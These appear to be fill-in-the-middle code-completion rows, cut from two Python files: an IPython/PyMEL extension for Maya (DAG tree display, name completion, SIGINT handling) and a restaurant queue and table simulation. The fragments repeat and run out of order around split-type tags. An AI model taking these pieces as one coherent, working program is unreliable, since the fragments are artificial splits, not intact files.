name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
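# Illustrative check (hypothetical invocation) of how the option string handed
# to the %dag magic is parsed by dag_parser above: "-d 2 -s persp" caps the
# tree at depth 2, keeps shape nodes, and roots the walk at a node named
# "persp" (the node name is an assumption, not something defined here).
_opts, _args = dag_parser.parse_args("-d 2 -s persp".split())
assert _opts.maxdepth == 2 and _opts.shapes is True and _args == ['persp']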
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]')  # fixed: the string has no format placeholder, and nn is only defined in the numeric-history branch
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler() | random_line_split |
||
ipymel.py | ()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
|
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList | raise TryNext | conditional_block |
ipymel.py | yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]')  # fixed: the string has no format placeholder, and nn is only defined in the numeric-history branch
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def | sigint_plugin_loaded_callback | identifier_name |
|
Server.py | (self.groups)
def isEmpty(self):
"""
Whether there are still groups waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue() | >>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # popping from the end of the list removes the group that arrived first
"""
Pop the head of the queue (index = length of queue - 1)
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes their meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
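# Tiny end-to-end sketch (hypothetical groups; relies on mod_pert_random being
# defined earlier in this module): non-VIP arrivals are inserted at index 0 and
# served from the end of the list, so ordinary groups are served first-come,
# first-served, while a VIP is bumped ahead of up to four waiting groups.
_q = Queue()
for _gid in range(3):
    _q.add_queue(Group(_gid, 2, False, _gid))   # groups 0, 1, 2 arrive in order
assert _q.del_queue().get_groupID() == 0        # earliest arrival is seated first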
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
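# Minimal usage sketch (the 6/4/2 split is the assumed default from the
# docstring): build the three table pools, then confirm the tables are numbered
# consecutively across pools and all start out free.
_t2, _t4, _t6 = tablesSetting(6, 4, 2)
assert [t.get_num() for t in _t2 + _t4 + _t6] == list(range(12))
assert not any(t.busy() for t in _t2 + _t4 + _t6)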
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group seated at it has finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list storing the total table occupancy time (requested dining time plus 2 minutes) for each group that has been or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is done; handle groups that were never assigned
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | >>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1) | random_line_split |
Server.py | .groups)
def isEmpty(self):
"""
Whether there are still groups waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group waiting to enter the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
|
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # popping from the end of the list removes the group that arrived first
"""
Pop the head of the queue (index = length of queue - 1)
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes their meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group seated at it has finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list storing the total table occupancy time (requested dining time plus 2 minutes) for each group that has been or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is done; handle groups that were never assigned
if current_time == total_time - 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | self.groups.insert(1, group) | conditional_block |
